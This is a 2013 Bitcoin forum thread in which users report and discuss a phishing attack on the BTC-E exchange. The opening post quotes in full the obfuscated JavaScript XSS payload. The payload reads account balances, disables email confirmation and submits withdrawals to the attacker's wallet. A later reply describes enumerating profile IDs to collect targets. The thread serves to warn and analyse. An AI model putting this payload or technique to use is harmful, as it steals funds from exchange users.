nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:35:36 PM |
|
Hello, today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or used the PM system there. It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file. This downloads a script which seems to exploit an XSS vulnerability on BTC-E. eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \" http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);")) According to Blockexplorer, significant amounts of BTC were already stolen: http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo
|
|
|
|
|
|
|
There are several different types of Bitcoin clients. The most secure are full nodes like Bitcoin Core, which will follow the rules of the network no matter what miners do. Even if every miner decided to create 1000 bitcoins per block, full nodes would stick to the rules and reject those blocks.
|
|
|
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:41:57 PM |
|
(could an admin/moderator move this to the proper section please?)
|
|
|
|
maurits150
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:42:35 PM |
|
I'm also interested how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.
|
|
|
|
dudeofthestick
Member
Offline
Activity: 78
Merit: 10
|
|
April 21, 2013, 06:46:36 PM |
|
What operating system and browser version are you using? With versions, please.
|
|
|
|
Becher-Karl
Newbie
Offline
Activity: 48
Merit: 0
|
|
April 21, 2013, 06:52:09 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:52:58 PM |
|
What operating system and browser version are you using? With versions, please.
Browser? I prefer to use wget on a seperate Linux box when someone wants me to click strange links...
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 06:54:34 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident.
|
|
|
|
optimator
|
|
April 21, 2013, 06:58:50 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 07:10:45 PM |
|
Looks like they have removed the attack scripts from the server. No problem, you have a copy here now.
|
|
|
|
bzh
Newbie
Offline
Activity: 34
Merit: 0
|
|
April 21, 2013, 07:15:10 PM |
|
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
|
|
|
|
samten
Newbie
Offline
Activity: 14
Merit: 0
|
|
April 21, 2013, 07:30:40 PM |
|
don't trust strangers
|
|
|
|
optimator
|
|
April 21, 2013, 07:38:05 PM |
|
I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
Bummer! That does lead one to the conclusion that there was inside help....
|
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 08:10:25 PM |
|
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever. Write a script that goes through all those numbers and have it send PMs. You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.
|
|
|
|
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
|
|
April 21, 2013, 08:40:09 PM |
|
Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)? I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.
|
|
|
|
|